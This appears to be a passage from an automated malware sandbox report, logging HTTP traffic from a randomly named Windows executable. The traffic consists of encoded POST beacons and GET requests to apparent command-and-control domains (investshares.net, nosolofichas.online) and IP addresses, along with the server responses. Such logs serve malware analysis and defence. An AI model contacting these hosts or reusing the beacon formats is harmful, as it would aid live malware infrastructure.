                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.450019154.197.162.239801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:53.638443947 CET743OUTPOST /cf9p/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.investshares.net
                                                                    Origin: http://www.investshares.net
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.investshares.net/cf9p/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6c 48 6e 6c 4e 62 61 71 65 77 6a 78 50 63 30 4f 79 57 33 70 43 6f 68 32 4e 59 6a 70 61 65 4f 69 38 61 79 55 6f 4e 36 69 43 71 32 7a 75 6e 70 76 74 38 4c 41 44 65 74 74 48 37 73 77 65 62 78 51 62 75 55 59 46 65 2f 62 42 4a 2f 58 67 4d 44 66 64 4c 73 67 42 66 4c 32 39 43 52 30 30 77 78 79 41 39 42 7a 43 4f 42 67 57 52 71 70 54 7a 65 48 75 68 31 51 38 39 72 6b 65 59 7a 45 4a 4c 43 6c 65 42 71 69 35 38 36 68 35 6f 34 75 47 37 31 4c 52 61 4b 49 49 54 51 7a 62 56 42 59 2b 65 78 64 30 42 75 42 54 6b 35 6c 51 4c 47 63 33 5a 37 33 43 71 6e 65 4e 67 3d 3d
                                                                    Data Ascii: 1V=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIITQzbVBY+exd0BuBTk5lQLGc3Z73CqneNg==
                                                                    Jan 3, 2025 11:40:54.204783916 CET309INHTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Thu, 02 Jan 2025 18:40:17 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.450020154.197.162.239801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:56.218512058 CET763OUTPOST /cf9p/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.investshares.net
                                                                    Origin: http://www.investshares.net
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.investshares.net/cf9p/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 71 69 2f 2f 65 55 70 50 65 69 42 71 32 7a 6d 48 70 71 67 63 4c 62 44 65 67 4f 48 2b 55 77 65 62 6c 51 62 76 45 59 5a 39 58 61 48 5a 2f 56 6d 4d 44 64 58 72 73 67 42 66 4c 32 39 43 55 38 30 77 35 79 41 4a 46 7a 45 71 56 6a 51 68 71 71 43 7a 65 48 6a 42 30 34 38 39 72 47 65 61 47 72 4a 49 36 6c 65 41 61 69 35 4a 4f 67 75 34 34 73 5a 72 30 6d 43 5a 72 45 4f 67 31 53 52 47 41 38 67 2f 49 2b 38 6e 6a 62 43 56 59 79 43 4c 69 76 71 65 79 44 50 70 61 58 57 72 65 47 54 70 6b 56 55 44 74 6c 32 63 4a 2f 75 68 64 50 30 42 34 3d
                                                                    Data Ascii: 1V=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMqi//eUpPeiBq2zmHpqgcLbDegOH+UweblQbvEYZ9XaHZ/VmMDdXrsgBfL29CU80w5yAJFzEqVjQhqqCzeHjB0489rGeaGrJI6leAai5JOgu44sZr0mCZrEOg1SRGA8g/I+8njbCVYyCLivqeyDPpaXWreGTpkVUDtl2cJ/uhdP0B4=
                                                                    Jan 3, 2025 11:40:56.792736053 CET309INHTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Thu, 02 Jan 2025 18:40:20 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.450021154.197.162.239801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:40:58.798161983 CET10845OUTPOST /cf9p/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.investshares.net
                                                                    Origin: http://www.investshares.net
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.investshares.net/cf9p/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6e 6e 58 6c 4c 34 43 71 5a 51 6a 32 41 38 30 4f 38 32 33 74 43 6f 64 32 4e 5a 6d 73 61 4d 69 69 2f 4a 4b 55 6f 75 65 69 41 71 32 7a 6c 48 70 72 67 63 4b 44 44 65 70 48 48 2b 52 4e 65 64 70 51 55 76 59 59 4a 4d 58 61 4f 5a 2f 56 6b 4d 44 59 64 4c 73 70 42 66 62 36 39 43 6b 38 30 77 35 79 41 50 70 7a 45 2b 42 6a 4c 68 71 70 54 7a 65 62 75 68 31 56 38 39 79 35 65 61 54 55 49 34 61 6c 65 67 4b 69 37 66 69 67 74 59 34 71 59 72 30 2b 43 5a 6d 47 4f 67 70 34 52 46 64 5a 67 2f 73 2b 2b 44 57 6c 52 6b 49 31 44 4b 2b 79 76 63 61 45 43 35 4f 4b 52 4b 57 74 44 73 77 4a 4b 6a 34 4d 39 50 63 53 78 56 68 33 75 47 72 42 55 74 4d 70 55 68 66 66 6e 2b 70 6d 51 59 51 6b 31 55 42 73 72 56 7a 2b 54 63 63 38 67 53 45 2f 4e 41 53 41 54 6d 6c 32 50 58 62 38 55 46 37 45 75 45 7a 62 44 35 53 66 36 34 47 55 74 44 4a 68 68 4f 2f 41 6a 76 6d 51 74 59 49 43 56 53 52 54 70 73 33 32 4c 4e 44 54 76 43 77 37 38 30 6a 67 32 45 4b 6e 62 56 6c 54 72 71 4c 73 45 6f 43 4c 6e 66 39 78 38 37 38 [TRUNCATED]
                                                                    Data Ascii: 1V=gmPPOGT6pgqjnnXlL4CqZQj2A80O823tCod2NZmsaMii/JKUoueiAq2zlHprgcKDDepHH+RNedpQUvYYJMXaOZ/VkMDYdLspBfb69Ck80w5yAPpzE+BjLhqpTzebuh1V89y5eaTUI4alegKi7figtY4qYr0+CZmGOgp4RFdZg/s++DWlRkI1DK+yvcaEC5OKRKWtDswJKj4M9PcSxVh3uGrBUtMpUhffn+pmQYQk1UBsrVz+Tcc8gSE/NASATml2PXb8UF7EuEzbD5Sf64GUtDJhhO/AjvmQtYICVSRTps32LNDTvCw780jg2EKnbVlTrqLsEoCLnf9x8785R6tF7CxlXwtVKv2wYhnTx8Za6h9L0sYMdg4toOYSxh6w5d8XOLnTp3qn+LSpun//lGFCGfBRLtsqTODD1paTkc684NnQxxmrS1lj3chZJiCOF9dyV9BbkvAmeu8QCPqWD+yVM1Y0eg4Rr47ZVM1Qk85ASI2YeqwVuOq4NabLKr/lrca7X1CWPGOAmLgbjX7hAe23NPSkVWAv9To7YTRo02L3/zhYWC+YfNgVZR/rPMGafLGgC2ll9d86TIhIHr7qc5DiyicgUG1gZziaep0VmsarGJv4FUj+MzpDG384YxW8RH4ZK/ua9jisoARvumytDoufwKrHhypBPHk6JDr7kfPFkXHWqyITJXWNiWFG92nnFVXaCQGXfay0sLD2djxasVqQaDIqzCc7QvE6NH1yk4hrhZdu+9NEcVyNDiecdg5fmI5le4lgrNxuPBUY92WwJD4Z6wPv14tNNFD2OOBDUOp5lFuVLJS1drhMhljoY88aB7pBXMcnR4h3RH9F5Z7uTEbNaVgIo91tou+hMtHx91Q4oE5+jssXTG18glLoMx1AYliSpMSuYQyoj6nO6tC7Uax8uhBc6jXwEJgS0nm9VT160Ukc2WYdRapqqRn+1Qohy69vVgqyvKoMzU+pza/CfJVAV+mxSjEGjzW7uFFgdnBcsyHGmanDh [TRUNCATED]
                                                                    Jan 3, 2025 11:40:59.463119984 CET309INHTTP/1.1 403 Forbidden
                                                                    Server: nginx
                                                                    Date: Thu, 02 Jan 2025 18:40:23 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 166
                                                                    Connection: close
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.450022154.197.162.239801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:01.339726925 CET471OUTGET /cf9p/?1V=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.investshares.net
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:01.916667938 CET141INHTTP/1.1 404 Not Found
                                                                    Server: nginx
                                                                    Date: Thu, 02 Jan 2025 18:40:25 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 0
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.45002384.32.84.32801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:07.012845039 CET752OUTPOST /hqr6/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.nosolofichas.online
                                                                    Origin: http://www.nosolofichas.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 199
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.nosolofichas.online/hqr6/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 2b 56 63 44 7a 41 4e 33 33 4e 6b 4b 4b 4c 72 6f 44 47 36 4b 2b 66 67 37 4a 6e 49 6b 31 45 30 30 53 2f 5a 73 57 4b 37 76 5a 53 6d 31 57 77 44 68 37 52 38 41 51 68 6b 4a 4b 7a 33 72 4a 64 75 44 4e 63 74 33 6b 54 6d 6d 38 50 69 4c 4b 47 46 62 30 67 4c 36 46 2b 47 47 6c 55 48 37 4f 50 42 6d 77 4b 74 6a 37 78 63 52 2f 56 4c 76 76 45 75 4d 74 59 6e 2b 73 6a 48 50 33 70 75 35 5a 71 62 47 47 65 2f 2f 70 73 52 79 36 64 4e 2f 43 62 64 53 34 2b 61 4d 51 33 64 4a 36 44 46 42 68 66 2f 51 30 6e 4e 69 4c 7a 56 57 69 47 4b 52 65 31 50 32 42 6d 70 4b 69 77 44 37 58 73 77 4e 4e 31 6f 7a 61 77 3d 3d
                                                                    Data Ascii: 1V=+VcDzAN33NkKKLroDG6K+fg7JnIk1E00S/ZsWK7vZSm1WwDh7R8AQhkJKz3rJduDNct3kTmm8PiLKGFb0gL6F+GGlUH7OPBmwKtj7xcR/VLvvEuMtYn+sjHP3pu5ZqbGGe//psRy6dN/CbdS4+aMQ3dJ6DFBhf/Q0nNiLzVWiGKRe1P2BmpKiwD7XswNN1ozaw==


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.45002484.32.84.32801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:09.568043947 CET772OUTPOST /hqr6/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.nosolofichas.online
                                                                    Origin: http://www.nosolofichas.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 219
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.nosolofichas.online/hqr6/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 2b 56 63 44 7a 41 4e 33 33 4e 6b 4b 4c 71 37 6f 51 33 36 4b 32 66 67 36 4d 6e 49 6b 2f 6b 30 77 53 2b 6c 73 57 4c 2f 2f 5a 67 43 31 57 55 48 68 36 56 6f 41 52 68 6b 4a 46 54 33 75 45 39 75 59 4e 63 68 46 6b 54 71 6d 38 50 32 4c 4b 48 31 62 30 58 6e 35 55 2b 47 41 71 30 48 31 44 76 42 6d 77 4b 74 6a 37 78 68 2b 2f 55 6a 76 75 30 65 4d 75 35 6e 78 6d 44 48 4d 79 70 75 35 64 71 62 43 47 65 2b 53 70 70 78 4d 36 65 31 2f 43 62 74 53 34 76 61 50 61 33 63 4d 30 6a 46 52 68 4b 4b 37 39 6c 6f 2b 49 67 35 66 6a 58 4b 41 66 7a 43 73 51 58 49 64 77 77 6e 49 4b 72 35 35 41 32 56 36 42 39 4e 41 63 76 39 50 4e 78 6b 38 64 39 57 72 50 2f 67 79 36 78 59 3d
                                                                    Data Ascii: 1V=+VcDzAN33NkKLq7oQ36K2fg6MnIk/k0wS+lsWL//ZgC1WUHh6VoARhkJFT3uE9uYNchFkTqm8P2LKH1b0Xn5U+GAq0H1DvBmwKtj7xh+/Ujvu0eMu5nxmDHMypu5dqbCGe+SppxM6e1/CbtS4vaPa3cM0jFRhKK79lo+Ig5fjXKAfzCsQXIdwwnIKr55A2V6B9NAcv9PNxk8d9WrP/gy6xY=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.45002584.32.84.32801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:12.116695881 CET10854OUTPOST /hqr6/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Accept-Encoding: gzip, deflate
                                                                    Host: www.nosolofichas.online
                                                                    Origin: http://www.nosolofichas.online
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 10299
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Referer: http://www.nosolofichas.online/hqr6/
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Data Raw: 31 56 3d 2b 56 63 44 7a 41 4e 33 33 4e 6b 4b 4c 71 37 6f 51 33 36 4b 32 66 67 36 4d 6e 49 6b 2f 6b 30 77 53 2b 6c 73 57 4c 2f 2f 5a 67 4b 31 57 68 54 68 37 30 6f 41 53 68 6b 4a 49 7a 33 76 45 39 75 5a 4e 63 49 4f 6b 54 32 63 38 4e 4f 4c 4b 6c 39 62 79 6d 6e 35 64 2b 47 41 79 45 48 34 4f 50 42 7a 77 4b 39 76 37 77 4e 2b 2f 55 6a 76 75 32 32 4d 36 59 6e 78 70 6a 48 50 33 70 75 6c 5a 71 61 58 47 64 4f 73 70 70 38 35 36 76 56 2f 42 37 39 53 72 4e 79 50 5a 58 63 4f 35 44 45 4f 68 4b 4f 6b 39 6c 30 79 49 68 4e 6d 6a 58 2b 41 63 30 33 6f 41 32 67 42 7a 47 76 54 51 72 4e 48 44 31 39 6a 43 73 6c 36 59 2b 78 34 55 54 34 6b 51 64 6d 37 61 74 67 34 73 78 64 63 47 68 6d 59 64 48 64 76 31 74 55 65 6d 72 46 47 43 57 49 47 7a 6b 7a 6c 33 34 46 6c 73 79 4e 31 47 39 72 58 73 56 4d 4f 53 51 35 53 6b 31 49 4b 71 33 6c 33 72 70 6d 62 37 53 53 77 74 4a 61 30 69 72 55 4e 66 43 68 55 4a 73 2b 77 4d 4b 44 4d 79 30 41 74 63 39 6d 6d 6d 42 73 68 79 43 44 43 79 47 58 58 62 6e 4b 34 36 78 58 77 42 79 71 31 4d 6e 70 4f 47 43 72 [TRUNCATED]
                                                                    Data Ascii: 1V=+VcDzAN33NkKLq7oQ36K2fg6MnIk/k0wS+lsWL//ZgK1WhTh70oAShkJIz3vE9uZNcIOkT2c8NOLKl9bymn5d+GAyEH4OPBzwK9v7wN+/Ujvu22M6YnxpjHP3pulZqaXGdOspp856vV/B79SrNyPZXcO5DEOhKOk9l0yIhNmjX+Ac03oA2gBzGvTQrNHD19jCsl6Y+x4UT4kQdm7atg4sxdcGhmYdHdv1tUemrFGCWIGzkzl34FlsyN1G9rXsVMOSQ5Sk1IKq3l3rpmb7SSwtJa0irUNfChUJs+wMKDMy0Atc9mmmBshyCDCyGXXbnK46xXwByq1MnpOGCrKiKTS3NCFO89sHNAmtrIYxyCs0NQhTGmhcLCRSo2JYIvTh/RO3K1XlUifc8AGkK3iz3jnaNlTGv4W5sj/Kwk1qjrXs9AX0aMAwIvl9cLfGB+P5IkzgWzhsEx47S+hd/trV3gf82e+Te3eUfdSjyRt7kXTIeAMdiOI17j9d5RhPumeLuaeCnr+jkXQYDWzclU3BlXlnZQhF4+TqXbPKV0d5ENwZbT3M8N1dPkVtrtLbG3P6A21Pb/sC5jLVODFrwrMsac/NlX47UmjyVC69Yilu6IyN3O1BhYCGIu40ux1M70UmQ7+oKG8gIvdpOJQS2Jm8pyEKSoDBTIHXTukxggv/iCOBYuG8QtOforMiCcke24lEd9F6WS/zmWg0MqGxWokJY65msJbmwAil1zPRcxtebXXFpgIrM9l/5FgNM47TtScqLtgT+d5JJBG0ti8aymMuS6Q5diBDbWi3T5Be8q9sW6c7AkbsCm9nmhNFq94OhTf8NhrT1L6vfk9yf/rUTBsNLgE+t/M0lbJjNRERT3bneDNGen0OEkAYuNUlSSwNTlySzmYhWVmkZwDg42d4MAKoA12IeT9EK2QD7iRLUlVZUv6nRevzeS3uCjwyDfa3pQ01Tz+EoSOKXvAlK+U/swduHz872m48KEUSiG1z6DGtpGrMwI2pFk/Q [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.45002684.32.84.32801748C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 3, 2025 11:41:14.652565956 CET474OUTGET /hqr6/?1V=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs=&w0DDw=KH0hz6 HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US
                                                                    Host: www.nosolofichas.online
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                                                    Jan 3, 2025 11:41:15.122035980 CET1236INHTTP/1.1 200 OK
                                                                    Date: Fri, 03 Jan 2025 10:41:15 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 9973
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Server: hcdn
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 19804dc9110f0bccc1258c7361fa5602-bos-edge1
                                                                    Expires: Fri, 03 Jan 2025 10:41:14 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
